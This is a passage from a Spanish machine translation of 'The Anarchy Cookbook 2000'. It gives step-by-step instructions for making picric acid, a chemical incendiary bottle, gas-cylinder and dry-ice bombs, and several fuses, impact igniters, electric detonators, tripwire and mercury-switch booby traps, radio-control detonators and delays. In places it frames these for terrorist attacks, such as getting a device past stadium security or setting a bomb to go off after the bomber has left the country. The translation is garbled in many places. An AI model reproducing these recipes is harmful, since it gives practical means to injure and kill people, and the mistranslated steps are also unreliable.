El ácido pícrico, también conocido como Tri-Nitro-fenol, o TNP, es un explosivo militar que se utiliza con mayor frecuencia como una carga detonante para detonar otro explosivo menos sensible, como el TNT. Se trata de otro explosivo que es bastante sencillo de hacer, asumiendo que uno puede adquirir el sulfúrico concentrado y ácido nítrico. Su procedimiento de fabricación se da en muchos manuales de laboratorio de química de la universidad, y es fácil de seguir. El problema principal con ácido pícrico es su tendencia a formar sales picratos peligrosamente sensibles e inestables, tales como picrato de potasio. Por esta razón, se hace generalmente en una forma más segura, como picrato de amonio, también llamado explosivo D. Una desviada social probablemente sería utilizar una fórmula similar a la presentada aquí para hacer ácido pícrico.

MATERIALES: • El fenol (9 ½ g) • El ácido sulfúrico concentrado (12 ½ ml)• El ácido nítrico concentrado (38 ml) • Agua destilada EQUIPO:• Frasco de 500 ml• Fuente de calor ajustable • 1000 ml vaso o lo otro contenedor adecuado para la ebullición en• Papel de filtro y embudo• Varilla de vidrio

1. Lugar de 9 ½ gramos de fenol en el matraz de 500 ml, y añadir con cuidado 12 ½ ml de ácido sulfúrico concentrado y se agita la mezcla.

2. Ponga 400 ml de agua del grifo en el vaso de 1000 ml o recipiente de ebullición y traer el agua a un hervor suave.

3. Después de calentar el matraz de 500 ml con agua caliente del grifo, introducirlos en el agua hirviendo, y se continúa agitando la mezcla de fenol y ácido durante unos treinta minutos. Después de treinta minutos, quitar la redoma, y deje que se enfríe durante unos cinco minutos.

4. Verter el agua hirviendo utilizado anteriormente, y después de permitir que el recipiente para enfriar, se utiliza para crear un baño de hielo, similar a la utilizada en los pasos 3-4. Colocar el matraz de 500 ml con el ácido mixto un fenol en el baño de hielo. Añadir 38 ml de ácido nítrico concentrado en pequeñas cantidades, agitando la mezcla constantemente. Una vigorosa pero "inofensiva" la reacción debe ocurrir. Cuando la mezcla deje de reaccionar vigorosamente, toma el matraz del baño de hielo.

Page 290: 106652012 the Anarchy Cookbook 2000 Es

5. Calentar el recipiente baño de hielo, si es de vidrio, y luego comenzar a hervir más agua de la llave. Poner el frasco que contiene la mezcla en el agua hirviendo, y se calienta en agua hirviendo durante 1 ½ a 2 horas.

6. Añadir 100 ml de agua destilada fría a la solución, y enfriar en un baño de hielo hasta que esté frío.

7. Filtrar los cristales de color blanco amarillento pícrico ácido vertiendo la solución a través del papel de filtro en el embudo. Recoger el líquido y disponer de ella en un lugar seguro, ya que es corrosivo.

8. Lavar el matraz de 500 ml con agua destilada, y poner el contenido del papel de filtro en el matraz. Añadir 300 ml de agua y agitar enérgicamente.

9. Vuelva a filtrar los cristales, y dejar que se sequen.10. Almacena los cristales en un lugar seguro en un recipiente de vidrio, ya que

reacciona con los envases de metal para producir picratos que podrían explotar espontáneamente.

BOTELLA DE FUEGO 203.CHEMICAL por el Éxodo

La botella de fuego químico es realmente un avanzado cóctel molotov. En lugar de usar el paño de la quema para encender el líquido inflamable, que tiene en el mejor de una buena oportunidad de encender el líquido, el frasco de fuego químico utiliza la reacción muy caliente y violenta entre el ácido sulfúrico y clorato de potasio. Cuando se rompe el contenedor, el ácido sulfúrico en la mezcla de gasolina pulverizaciones sobre el papel empapado en clorato de potasio y azúcar. El documento, al ser golpeado por el ácido, al instante estalla en una llama blanca, encender la gasolina. La probabilidad de fallo para encender la gasolina es inferior al 2%, y se puede reducir a 0%, si hay suficiente clorato potásico y azúcar de sobra.

MATERIALES:• Clorato de Potasio (2 cucharaditas)• Azúcar (2 cucharaditas) • El ácido sulfúrico concentrado (4 oz.) • Gasolina (8 oz.) EQUIPO:• 12 oz botella de vidrio• Tapa de botella, con el plástico en el interior• Cocina Pan con bordes elevados• Toallas de papel• De vidrio o de plástico taza y una cuchara

1. Prueba de la tapa de la botella con unas pocas gotas de ácido sulfúrico para asegurarse de que el ácido no se comen la tapa de la botella durante el almacenamiento. Si el ácido se come a través de él en 24 horas, una nueva tapa debe ser encontrado y probado, hasta un límite que el ácido no se come a través se encuentra. Una tapa de cristal es excelente.

2. Vierta cuidadosamente 8 oz de gasolina en la botella de vidrio.3. Vierta cuidadosamente 4 oz de ácido sulfúrico concentrado en la botella de vidrio.

Limpie cualquier derrame de ácido en los lados de la botella, y enrosque la tapa en el frasco. Lave el exterior de la botella con agua abundante. Déjelo a un lado que se seque.

4. Poner dos cucharaditas de clorato de potasio y dos cucharaditas de azúcar en el vaso o taza de plástico. Agregar ½ taza de agua hirviendo, o lo suficiente para disolver todo el clorato de potasio y azúcar.

5. Coloque una hoja de papel toalla en el recipiente de cocción con bordes elevados. Doble la toalla de papel por la mitad, y se vierte la solución de clorato de potasio y azúcar disuelto en él hasta que esté completamente mojada. Deje que la toalla para secarse.

6. Cuando está seco, poner algo de pegamento en el exterior de la botella de vidrio que contenía la mezcla de gasolina y ácido sulfúrico. Envuelva la toalla de papel alrededor de la botella, asegurándose de que se pega a él en todos los lugares. Guarde la botella en un lugar donde no se rompe o se volcó.

Page 291: 106652012 the Anarchy Cookbook 2000 Es

7. Cuando haya terminado, la solución en la botella debe aparecer como dos líquidos distintos, uno oscuro rojo parduzco solución en la parte inferior, y una solución clara en la parte superior. Las dos soluciones no se mezclan. Para utilizar la botella de fuego químico, sólo tiene que lanzar en cualquier superficie dura.

8. NUNCA ABRA LA BOTELLA, ya que algunos ÁCIDO SULFÚRICO podría estar en la PAC, que podía fluir por el lado de LA BOTELLA Y ENCENDER el clorato de potasio, provocando un incendio Y / O EXPLOSIÓN.

9. Para probar el aparato, corte un pedazo de la toalla de papel de la botella, y poner unas gotas de ácido sulfúrico sobre el mismo. La toalla de papel inmediatamente estalló en una llama blanca.

EXPLOSIVOS Gas EmbotelladoGas envasado, tales como butano para encendedores recarga, propano para estufas de propano o para quemadores Bunsen, se puede utilizar para producir una potente explosión. Para hacer que un dispositivo, todo lo que un anarquista ingenuo tendría que hacer sería tomar el contenedor de gas envasado y colocar encima una lata de Sterno o combustible gelatinizado otra parte, la luz del combustible y correr. Dependiendo del combustible utilizado, y en el espesor del recipiente de combustible, el gas líquido se evapora y se expanden para el punto de rotura del recipiente en unos cinco minutos.

En teoría, el gas de inmediato se encendió por el combustible gelatinizado combustión, produciendo una gran bola de fuego y explosión. Desafortunadamente, la explosión de la bombona de gas envasado a menudo pone el combustible, evitando así que el gas en expansión se encienda. Mediante el uso de un medio cubo de metal lleno de gasolina, sin embargo, las posibilidades de ignición son mejores, ya que la gasolina es menos probable que se extingue. Colocar el recipiente de gas envasado en una cama de la quema de carbón empapado en gasolina sería probablemente la forma más eficaz de asegurar la ignición del gas en expansión, ya que si bien la explosión de la bombona de gas puede apagar la llama de la gasolina, el carbón quema de inmediato en caso de que vuelva a encender. El óxido nitroso, hidrógeno, propano, acetileno, gas inflamable o cualquier otro lo hará muy bien.

Durante la reciente guerra del Golfo, combustible / aire bombas se promociona como el segundo lugar de las armas nucleares en sus efectos devastadores. Estos son básicamente similares a los dispositivos anteriores, excepto que una carga explosiva se utiliza para la rotura del recipiente de combustible y lo dispersan sobre un área amplia. Una segunda carga se utiliza para detonar el combustible. La reacción se dice que produce una onda de choque masiva y para quemar todo el oxígeno en un área grande, causando asfixia.

Otro beneficio de un explosivo de combustible-aire es que el gas se filtrará en búnkeres fortificados y otros espacios parcialmente cerrados, por lo que una gran bomba colocada en un edificio daría lugar a la destrucción de la mayoría de las habitaciones circundantes, haciéndolo estructuralmente defectuoso.

Hielo 204.Dry por el Éxodo

No existe una fórmula estándar para una bomba de hielo seco, sin embargo una forma genérica es la siguiente:

Tome una botella de refresco de 2 litros, vacío por completo, luego añadir aproximadamente libras 3/4 de hielo seco (aplastado funciona mejor) y (opcional) una cantidad de agua.

Dependiendo de la condición de la botella, el tiempo, y la cantidad y la temperatura de la botella de la bomba se apagará en 30 segundos - 5 minutos. Sin ningún tipo de adición de agua, las botellas de 2 litros se van a menudo en 3-7 minutos si se deja caer en un río de agua caliente, y en 45 minutos a 1 hora y media al aire libre.

Page 292: 106652012 the Anarchy Cookbook 2000 Es

La explosión suena equivalente a un M-100. _Plastic_ 16 oz botellas de refrescos y botellas de 1 litro funcionan casi tan bien como lo hacen los litros-2, sin embargo, las botellas de vidrio no son tan fuertes, y pueden producir metralla peligrosa.

Recuerde, estas son LOUD! Un compañero mío de clase creado 10 botellas en un parque cercano, sin añadir agua. Después de los dos primeros se fue (hubo alrededor de 10 minutos entre las explosiones), llegó la policía y pasó la siguiente hora tratando de encontrar al tipo que se cree fue de salir M-100 es a su alrededor ...

USOS DE HIELO SECO

Bombas de Tiempo:

1. Consiga un recipiente de plástico con tapa (se utilizaron las latas pequeñas de plástico que sujetan las montañas utilizados para gran formato de película Polaroid). Un rollo de película probablemente, podría funcionar, la clave está, hay que selle bien y tener una buena cantidad de esfuerzo para abrir). Coloque un pedazo de hielo seco en la lata, poner en la tapa sin realmente sellado. Ponga la bomba montada en el bolsillo, o detrás de su espalda. Acérquese a la marca y participar en una conversación normal. Cuando su atención se aleje para sellar la tapa de la bomba, lo depositan en algún lugar dentro de algunos pies de la marca, fuera de la vista obvio, después se van. En función de las variables (que querrá experimentar primero), se escucha un fuerte "pop" y uno aún más fuerte "Aarrgghhh!" dentro de un minuto, cuando la presión de CO ² llega a ser suficiente para volar la tapa. En un laboratorio desordenado, esto es doblemente desagradable, porque la marca que probablemente nunca saber lo que hacía el ruido.

2. Ponga 2-3 pulgadas de agua en una botella de gaseosa de 2 litros de plástico. Poner en trozos, como muchos de hielo seco como sea posible antes de que el humo se pone demasiado espesa. Atornille la tapa, colocar en un lugar apropiado, y correr como el infierno. Después de un minuto (su experiencia puede variar), una gran explosión se traducirá, rociando agua por todas partes, junto con lo que queda de la botella de 2 litros.

Más cosas que hacer con hielo seco:

¿Alguien ha echado hielo seco en una piscina pública? Siempre y cuando la arrojo en la parte inferior de la parte más profunda, es seguro, y es realmente impresionante, si el agua está lo suficientemente caliente

"Fun stuff. Grita cuando entra en contacto con el metal ...""Usted puede sostener con seguridad un pequeño trozo de hielo seco en la boca si KEEP IT en constante movimiento. Parece como si estuvieras fumando o en el fuego. "

Nota del Editor: El hielo seco puede ser muy divertido, pero nos pongamos en guardia:

Usando nada más que de plástico para contener las bombas de hielo seco es un suicidio. El hielo seco es más peligroso que el TNT, porque es muy impredecible. Incluso una botella de 2 litros se pueden producir algunas esquirlas desagradable: Una fuente me dice que causó una explosión con una botella de 2 litros, que destruyó un cubo de basura metálico. Además, se rumorea que varios niños han sido asesinados por los fragmentos de vidrio que resulta de la utilización de una botella de vidrio. Por alguna razón, las bombas de hielo seco se han convertido en muy popular en el estado de Utah. Como resultado, las bombas de hielo seco han sido clasificados como dispositivos infernales, y la posesión es un delito penal.

205.Fuses o encendedores o retrasos por el Éxodo

Hay muchas maneras de encender dispositivos explosivos. No es el clásico "prender la mecha, arrojar la bomba, y ejecutar" enfoque, y no son los interruptores de mercurio sensibles, y muchas cosas en el medio. Generalmente, los sistemas eléctricos de

Page 293: 106652012 the Anarchy Cookbook 2000 Es

detonación son más seguros que los fusibles, pero hay veces en que los fusibles son más apropiados que los sistemas eléctricos, es difícil de llevar a un sistema de detonación eléctrica en un estadio, por ejemplo, sin ser capturados. Un dispositivo con un fusible o ir provistos al impacto sería más fácil de ocultar.

FUSIBLE DE ENCENDIDOLa forma más antigua de ignición explosiva, los fusibles son quizás el tipo favorito de sistema de ignición simple. Simplemente colocando un trozo de mecha en un dispositivo resistente al agua, uno puede tener casi garantizada la ignición. Fusible a prueba de agua moderno es muy fiable, quemando a una velocidad de alrededor de 2 ½ segundos por pulgada. Está disponible como modelo de fusible de cohetes en las tiendas de la mayoría de los aficionados, y cuesta alrededor de $ 3,00 para una longitud de nueve pies. Cannon fusible es un sistema de encendido popular para los bombarderos de tuberías debido a su simplicidad. Todo lo que hay que hacer es encender con una cerilla o un encendedor. Por supuesto, si el Ejército tenía fusibles de este tipo, a continuación, la granada, que utiliza un fusible de encendido, sería muy poco práctico. Si un sistema de encendido granada puede ser adquirida por todos los medios, es el más eficaz. Pero, puesto que tales cosas no se limitan a flotar, lo mejor es preparar un sistema de fusibles que no requiere el uso de un fósforo o un encendedor, pero aún conserva su sencillez. Uno de tales métodos se describen a continuación:

MATERIALES:• Golpe-en la cubierta coincida con el tipo• Cinta eléctrica o cinta-Duct• Fusible a prueba de agua

1. Para determinar la velocidad de combustión de un tipo particular de fusible, simplemente medir una pieza de 6 pulgadas o más de fusible y encenderlo. Con un cronómetro, presione el botón de inicio de la en el instante en que las luces de los fusibles y detener el reloj cuando la mecha llega a su fin. Dividir el tiempo de quemar por la longitud de mecha, y que tiene la velocidad de combustión de la mecha, en segundo por pulgada. Esto se muestra a continuación:

Supongamos que una pieza de ocho pulgadas de fusible se quema, y su tiempo completo de la combustión es de 20 segundos.

20 segundos / 8 pulgadas = 2 ½ segundos por pulgada.

Si un retardo de 10 segundos se desea con este fusible, dividir el tiempo deseado por el número de segundos por pulgada:

10 segundos o 2 ½ segundos por pulgada = 4 pulgadas

NOTA: LA DURACIÓN DE FUSIBLE aquí significa LONGITUD DEL FUSIBLE al polvo. ALGUNOS FUSE, al menos una pulgada, debe estar dentro del DISPOSITIVO. Agregar siempre este pulgada extra, y poner esta pulgada adicional UNA PULGADA EN EL APARATO!

2. Después de decidir cuánto tiempo se desea un retraso antes de que el artefacto explosivo es ir fuera, añadir alrededor de ½ pulgada a la cantidad previamente medida de fusible, y lo cortó.

3. Retire con cuidado los partidos de cartón de la caja de papel partido. No retire los partidos individuales, mantenga todos los partidos unidos a la base de cartón. Tome una de las secciones del partido de cartón, y dejar el otro para hacer un encendedor de segundo.

4. Envuelva los partidos en torno a la final de la mecha, con los jefes de los partidos que tocan al final de la mecha. Cinta allí con seguridad, asegurándose de no poner cinta adhesiva sobre las cabezas de las cerillas. Asegúrese de que estén muy seguro tirando de las mismas en la base de la asamblea. No deben ser capaces de moverse.

Page 294: 106652012 the Anarchy Cookbook 2000 Es

5. Envuelva la tapa de los partidos en torno a los partidos unidos al fuselaje, asegurándose de que el papel es el delantero por debajo de las cabezas de las cerillas y el delantero se enfrenta a las cabezas de las cerillas. Pegue el papel de modo que es bastante fuerte alrededor de los partidos. No cinta adhesiva de la cubierta del delantero del fusible o de los partidos. Deje suficiente de la obra para sacar partido de la ignición.

_____________________ \ / \ / ------ Coincidir con la portada del libro \ / | M | f | M --- | ------- partido la cabeza | A | U | A | | T | s | T | | C | E | C | | Tapeh |. | Htape | | | F | | | # # # # # | U | # # # # # | -------- papel sorprendente | # # # # # | S | # # # # # | \ | E | / \ |. | / \ | F | / \ | U | / | TA | s | pe | | Ta | e | pe | |. | |. | | _ |

El libro partido se envuelve alrededor de los partidos, y se grabó a sí mismo. Los partidos se graban en el fusible. El delantero se frota contra los matcheads partido cuando el libro se tira.

6. Cuando esté listo para usar, simplemente tire del papel partido. Hay que sacar el papel sorprendente a través de las cabezas de las cerillas con la fricción suficiente para encenderlos. A su vez, los matcheads se quema el fusible de la luz, ya que junto a las cabezas de las cerillas encendidas.

CÓMO HACER FUSE BLACKMATCH:Tome una pieza plana de plástico o de metal (latón o aluminio son fáciles de trabajar y no se oxida). Haga un agujero 1/16th pulgadas a través de él. Esta es su matriz para dimensionar el fusible. Usted puede hacer los fusibles tan grande como usted quiera, pero este es el tamaño correcto para la bomba de la tubería que va a obtener más adelante.

Para alrededor de ½ taza de polvo negro añada agua para hacer una pasta fina. Agregar ½ cucharadita de almidón de maíz. Cortar algunos pies de largo de un hilo de algodón. El uso de algodón, no de seda o hilo a partir de fibras sintéticas. Ponga estos juntos hasta que tenga un espesor que rellena el agujero en la matriz, pero se pueden extraer a través de muy fácilmente.

Ate su paquete de hilos en un extremo. Separar los temas y mantener el paquete por la mezcla de polvo negro. Baje los hilos con un movimiento circular para que empiecen encrespa sobre la mezcla. Pulse en ellas con el dorso de una cuchara y seguir bajando ellos para que la bobina en la pasta. Tome el extremo tiene en sus manos y pásela por la matriz. Tire de ella a través suavemente en un movimiento largo.

Para secar el fusible, se colocan sobre un trozo de papel de aluminio y cocer en el horno 250 ° y no lo ate a una parrilla en el horno y deje que cuelgue hacia abajo. El fusible debe ser horneados para que sea lo bastante rígido para los usos que se pondrán más adelante. El secado al aire no va a hacer el trabajo. Si ha utilizado el nitrato de sodio, que ni siquiera se seque por completo a temperatura ambiente.

Page 295: 106652012 the Anarchy Cookbook 2000 Es

Cortar la mecha seca con unas tijeras en 2 pulgadas de largo y guárdelos en un recipiente hermético de aire. Manejar este fusible con cuidado para evitar romperlo. También puede utilizar un fusible de fuegos artificiales, si usted tiene alguno disponible. Los fusibles generalmente se puede sacar sin romperse. Para dar un poco de tiempo de ejecución, se le extiende estos fusibles (blackmatch o fusible petardo) con mecha azufrada.

Finalmente, es posible hacer un fusible relativamente combustión lenta en el hogar. Al disolver una cucharadita de polvo negro en alrededor de 1/4 de taza de agua hirviendo, y, mientras aún está caliente, mojando en ella un trozo largo de toda la cadena de algodón, un fusible de combustión lenta se puede hacer. Después de que se seque cuerda mojada, entonces debe estar ligada a la mecha de un artefacto explosivo. A veces, el extremo de la mecha de combustión lenta que cumpla con el fusible normal tiene una carga de polvo negro o pólvora en el punto de intersección para asegurar la ignición, ya que el fusible de combustión lenta no se quema a una temperatura muy alta.

Un tipo similar de mecha lenta se pueden hacer tomando la mezcla por encima de agua hirviendo y polvo negro y vertiéndola en un trozo largo de papel higiénico. El papel higiénico húmedo es entonces suavemente retorcido de modo que se asemeja a un fusible petardo, y se deja secar.

CÓMO HACER LA MECHA azufradosUse hilo de algodón pesado sobre 1/8th pulgadas de diámetro. Usted puede encontrar algunos en una fuente del jardín de inmovilización de los tomates. Asegúrese de que es el algodón. Se puede probar por la iluminación uno de los extremos. Se debería seguir ardiendo después de que el partido se retira y cuando se sopla a cabo tendrá un carbón ardiendo en el extremo. Ponga un poco de azufre en un recipiente pequeño, como un molde de tarta pequeña y derretir en el horno a 250 °.

Se funden en un líquido de color amarillo transparente. Si se comienza a dar vuelta marrón, es demasiado caliente. Bobina de una longitud de un pie de la cadena en él. El azufre fundido se absorberá rápidamente. Cuando se satura, tire de él y lo atan a enfriar y endurecer.

Se puede cortar a las longitudes deseadas con tijeras. 2 pulgadas está bien. Estas mechas se queman lentamente, con una llama azul y no sople con facilidad con un viento moderado. Ellos no se quema a través de un agujero en un tubo de metal, pero son grandes para la ampliación de su fusible de otro. No van a lanzar chispas. Blackmatch genera chispas que pueden prender fuego que a lo largo de su longitud causando la quema de momentos impredecibles.

ENCENDIDO DE IMPACTO --- ---Impacto de encendido es un excelente método de ignición espontánea de las actividades terroristas. El problema con un dispositivo de impacto-detonante es que debe ser mantenido en un recipiente muy seguro, de modo que no va a explotar mientras son transportados al lugar donde se va a utilizar. Esto se puede hacer por tener un iniciador impacto extraíble.

El iniciador de impacto mejor y más fiable es la que utiliza iniciadores o cebadores de fábrica realizadas. A No. 11, la tapa de armas de fuego de pólvora negra es un cebador tal. Por lo general vienen en cajas de 100, y cuesta alrededor de $ 2 ½ 0. Para utilizar ese límite, sin embargo, se necesita un pezón que quepa en. Pezones negros en polvo también están disponibles en las tiendas de armas. Todo lo que una persona tiene que hacer es pedir un paquete de los pezones y las gorras que les encajan. Los pezones tienen un agujero que va todo el camino a través de ellos, y tienen un extremo roscado y un final para poner la tapa. Un corte de un pezón se muestra a continuación:

________________ | | _ | | | | | / \ / \ / \ / \ / \ / \ / \ / \ |

Page 296: 106652012 the Anarchy Cookbook 2000 Es

_______ | | ^ ^ ^ ^ ^ ^ ^ | | ___________ | | |N º 11 | _______ |percusión _______ ------- Temas para atornillar la tapa: aquí | __________ pezón en una bomba | ____ | | | ^ ^ ^ ^ ^ ^ ^ ^ ^ | | _ | | / \ / \ / \ / \ / \ / \ / \ / \ / | | | | _________________ |

Al hacer uso de este tipo de iniciador, un agujero debe ser perforado en cualquier recipiente se utiliza para hacer la bomba de. El pezón se enrosca en el agujero para que encaje bien. Entonces, la tapa puede ser transportado y colocado en la bomba cuando se va a producir. La tapa se debe doblar una pequeña cantidad antes de que se coloca en el pezón, para asegurarse de que permanece en el lugar. El único problema que otro implicado con una bomba detonante impacto es que se debe golpear una superficie dura en el pezón para desactivarla. Al colocar las aletas o un pequeño paracaídas en el extremo de la bomba frente a la imprimación, la bomba, cuando se lanza, para herir la tierra en la cartilla, y explotar. Por supuesto, una bomba con fulminato de mercurio en cada extremo se apagará en el impacto, independientemente de lo cual se logra, pero fulminato de mercurio también es probable que se apagan si la persona que llevaba la bomba se golpea duro.

--- MAGICUBE ENCENDEDOR ---Un iniciador de impacto muy sensible y fiable puede ser producido a partir de la MAGICUBE común ($ 2.40 por 12) flashes de tipo. Basta con romper la cubierta de plástico, retire el reflector, y verás 4 bombillas, cada una de ellas tiene una pequeña barra de metal mantiene en su lugar.

Sujete cuidadosamente esta barra con un par de alicates de punta fina, y haga palanca suavemente hacia arriba, asegurándose de que no se aplica fuerza a la caña del VIDRIO.

Cada bombilla está recubierta con plástico, que debe ser eliminado para que sean efectivos en nuestra solicitud. Este recubrimiento puede ser eliminado por inmersión de los bulbos en un pequeño vaso de acetona durante 30-45 minutos, momento en el cual el plástico puede ser fácilmente desprendido.

El mejor método para utilizar estos es el de disolver algunos a base de nitrocelulosa en polvo sin humo en acetona y / o éter, formando una espesa pasta parecida a la goma. Cubrir el extremo del fusible con esta pasta, entonces se pega el bulbo (con la varilla de metal hacia fuera) en la pasta. Alrededor de la mitad del bulbo debe estar completamente cubierto, y si una capa muy delgada de nitrocelulosa se recubre durante el resto a continuación de encendido debe ser muy fiable.

Para asegurarse de que las tierras de dispositivo con el bulbo hacia abajo, una serpentina pequeña se puede conectar a la parte opuesta, así que cuando se lanza en el aire el extremo correspondiente a chocar con el suelo.

ENCENDIDO ELECTRICO --- ---Los sistemas eléctricos de encendido de la detonación suelen ser la forma más segura y confiable fuente de ignición. Los sistemas eléctricos son ideales para trabajos de demolición, si uno no tiene que preocuparse tanto por ser capturados. Con dos carretes de 500 pies de alambre y una batería de coche, se puede detonar explosivos en un lugar "seguro", a una cómoda distancia, y estar seguros de que no hay nadie cerca que pudiera salir lastimado. Con un sistema eléctrico, se puede controlar exactamente a qué hora va a explotar un dispositivo, en fracciones de segundo. La detonación se puede cancelar en menos de un segundo aviso, si una persona de repente entra por la vista de detonación, o si opta por un coche de policía para rodar por el en ese momento. Los mejores dos encendedores eléctricos son detonadores militares y equipos de encendido cohetes modelo. Detonadores para la construcción también funcionan bien. Encendedores Modelo

Page 297: 106652012 the Anarchy Cookbook 2000 Es

cohetes se venden en paquetes de seis, y costará alrededor de $ 1.00 por paquete. Todo lo que hay que hacer para usarlos es conectarlo a dos cables y pasar una corriente a través de ellos. Detonadores militares son difíciles de conseguir, pero son un poco mejor, ya que explotan cuando una corriente se ejecuta a través de ellos, mientras que los encendedores de cohetes sólo estalló en llamas. La mayoría de los petardos no detonará KClO3/petroleum la jalea o el RDX. Esto requiere una detonación tapa tipo de chorreado en la mayoría de los casos. Hay, sin embargo, militares mechas explosivas que harán el trabajo.

Encendedores se puede utilizar para compensar polvo negro, fulminato de mercurio, o algodón pólvora, que a su vez, puede establecer de un explosivo de alto orden.

--- CÓMO HACER UNA FUZE ELECTRICA ---Al capitán Hack & GW

Tome una bombilla de una linterna y colocarla punta de vidrio hacia abajo en un archivo. Moler hacia abajo en el archivo hasta que hay un agujero en el extremo. Soldar un alambre para el caso de la bombilla y otro para el conductor central en el extremo. Llene la bombilla con el polvo negro o cabeza de fósforo en polvo. Uno o dos pilas de linterna calienta el filamento de la bombilla haciendo que el polvo para encender.

--- OTRO FUZE ELECTRICA ---Tome un grado medio de la lana de acero y tirar de una hebra de ella. Adjuntar a los extremos de dos piezas de alambre de cobre, envolviendo a su alrededor unas cuantas vueltas y luego pinchar en un pequeño trozo de soldadura para obligar a la cadena para el cable. Usted quiere que alrededor de ½ pulgada de cable de acero entre los cables. Número 18 o 20 es un alambre de buen tamaño para su uso.

Corte de ½ pulgada por 1 pieza de cartón del tipo utilizado en las cubiertas de los partidos. Coloque un pequeño montón de polvo la cabeza del fósforo en el centro y aplastarla. Coloque los cables de modo que el filamento de acero está encima de y en contacto con el polvo. Espolvorear con más polvo que cubre la cadena.

La hebra debe estar rodeada con polvo y sin tocar nada más, excepto los cables en sus extremos. Colocar un trozo de blackmatch en contacto con el polvo. Ahora ponga un pedazo de cinta adhesiva en la parte superior de la parcela, y doblar en los dos extremos. Presione hacia abajo de modo que se adhiere todo el polvo. Los alambres están sobresaliendo en una cara y el blackmatch por el otro.Una batería de la linterna sola desactiva esta opción.

--- ELECTROMECÁNICOS DE ENCENDIDO ---Electro-mecánicos sistemas de encendido son los sistemas que utilizan algún tipo de interruptor mecánico para hacer estallar una carga explosiva eléctricamente. Este tipo de interruptor se usa típicamente en las trampas explosivas y otros dispositivos en los que la persona que la bomba no desea estar en cualquier lugar cerca del dispositivo cuando explota. Varios tipos de electro-mecánicos detonadores se discutirá

--- Mercury Switches ---Los interruptores de mercurio son un conmutador que utiliza el hecho de que el metal mercurio conduce la electricidad, al igual que todos los metales, pero el metal mercurio es un líquido a temperatura ambiente. Un interruptor de mercurio típico es un tubo de vidrio sellado con dos electrodos y un talón de metal mercurio. Está sellado a causa de la mala costumbre de mercurio de un desprendimiento de vapores que dañan el cerebro. El siguiente diagrama puede ayudar a explicar un interruptor de mercurio. ______________ A / \ B _____wire + ______ / _________ \ \ (Hg) | / \ _ (_Hg___) | ___ / | | de alambre - | | |

Page 298: 106652012 the Anarchy Cookbook 2000 Es

Cuando la gota de mercurio ("Hg" es símbolo atómico del mercurio) toca los dos contactos, la corriente fluye a través del conmutador. Si este interruptor particular, estaba en su posición actual, A, B ---, habría corriente, puesto que el mercurio puede tocar los dos contactos en la posición horizontal.

Si, sin embargo, fue en la | posición, la gota de mercurio sólo toca el contacto + en el lado A. Actual, entonces no podía fluir, puesto que el mercurio no alcanza los dos contactos cuando el interruptor está en la posición vertical. Este tipo de conmutador es ideal para colocar por una puerta. Si se coloca en el camino de una puerta giratoria en la posición vertical, el movimiento de la puerta se golpee el interruptor hacia abajo, si se llevó a cabo al suelo por una pieza si la cinta. Esto inclinar el interruptor en la posición vertical, haciendo que el mercurio a tocar los dos contactos, permitiendo que la corriente fluya a través del mercurio, y en el encendedor o cebo en un dispositivo explosivo.

--- --- Interruptores de TripwireUn Tripwire es un elemento de la trampa clásica. Al colocar una línea casi invisible de la línea de cuerda o de la pesca en la ruta probable de una víctima, y por poner algún tipo de trampa también, cosas desagradables pueden causar que se produzca. Si este modo de pensar se aplica a los explosivos, ¿cómo se utiliza un cable trampa para detonar una bomba. La técnica es sencilla. Por envolver las puntas de una pinza de ropa estándar con papel de aluminio, y colocando algo entre ellos, y la conexión de cables a cada contacto una lámina de aluminio, un cable trampa eléctrica se puede hacer, si una pieza de madera unida a la Tripwire se colocó entre los contactos en el gancho, el gancho serviría como un interruptor. Cuando el cable trampa fue retirado, el gancho se rompería en conjunto, permitiendo que la corriente fluya entre las dos piezas de papel de aluminio, completando así un circuito, que tendría el encendedor o cebo en ella. Corriente fluiría entre los contactos en el encendedor o cebo, calor o ignición del cebo, provocando que se explotan. Asegúrese de que los contactos de lámina de aluminio no toque la primavera, desde la primavera también conduce la electricidad.

--- Los detonadores Radio Control ---En las películas, todos los terroristas o criminales utiliza un detonador controlado por radio para detonar los explosivos. Con un detonador buena radio, se puede estar a varios kilómetros de distancia del dispositivo, y aún así controlar exactamente cuando estalla, en gran parte de la misma manera que un interruptor eléctrico. El problema con los detonadores de radio es que son bastante costosos. Sin embargo, podría ser una razón por la cual un terrorista quisiera gastar las cantidades de dinero involucradas con una RC (radio control) del sistema y lo utilizan como un detonador. Si un individuo quería idear un detonador RC, todo lo que tendría que hacer es visitar la tienda local de la manía o la tienda de juguetes, y comprar un juguete de radio control. Tomando de nuevo a su / morada, todo lo que él / ella tiene que hacer es separar el solenoide / motor que controla el movimiento de las ruedas delanteras de un coche de RC, o separar el solenoide / motor de los ascensores y de un timón avión RC, o el timón de un barco de RC, y vuelva a conectar el dispositivo de ignición del motor petardo o un cohete a los contactos de la electroválvula / motor. El dispositivo debe ser probado varias veces con mechas o encendedores, y las baterías completamente cargadas deben ser en tanto que el controlador y el receptor (la parte que se utiliza para mover las piezas antes de que el dispositivo se convirtió en un detonador).

RETRASOS --- ---Un retraso es un dispositivo que hace que el tiempo de pasar de un dispositivo cuando se establece hasta el momento en que explota. Un fusible es un retraso, pero que le costaría un poco para tener un retraso de 24 horas con un fusible. En esta sección se ocupa de los diferentes tipos de retrasos que pueden ser empleadas por un terrorista que quiere estar seguro de que su bomba se apagará, pero quiere estar fuera del país cuando lo hace.

RETRASOS --- FUSE ---Es muy simple para retrasar los artefactos explosivos que emplean los fusibles para la ignición. Tal vez la forma más sencilla de hacerlo es con un cigarrillo. Un cigarrillo se quema media de entre 8-11 minutos. La calificación más alta es la "alquitrán" y la

Page 299: 106652012 the Anarchy Cookbook 2000 Es

nicotina, el más lento de las quemaduras de cigarrillos. Bajo los cigarrillos "alquitrán" y la nicotina quema más rápido que el más alto "alquitrán" y los cigarrillos de nicotina, pero también son menos propensos a salir si no se corrige, es decir, no fumaba. Dependiendo del viento o el proyecto en un lugar determinado, un alto "tar" cigarrillo es mejor para retrasar el encendido de un fusible, pero debe haber suficiente viento o el proyecto para dar el cigarrillo suficiente oxígeno para quemar. Las personas que consumen cigarrillos con el fin de retrasar los fusibles suelen probar los cigarrillos que se va a utilizar con antelación para asegurarse de que permanece encendido, y para ver cuánto tiempo le va a quemar. Una vez que un cigarrillo velocidad de combustión se determina, es una simple cuestión de poner cuidado un agujero todo el camino a través de un cigarrillo con un palillo de dientes en el punto deseado, y empujando el fusible para un dispositivo en el agujero formado.

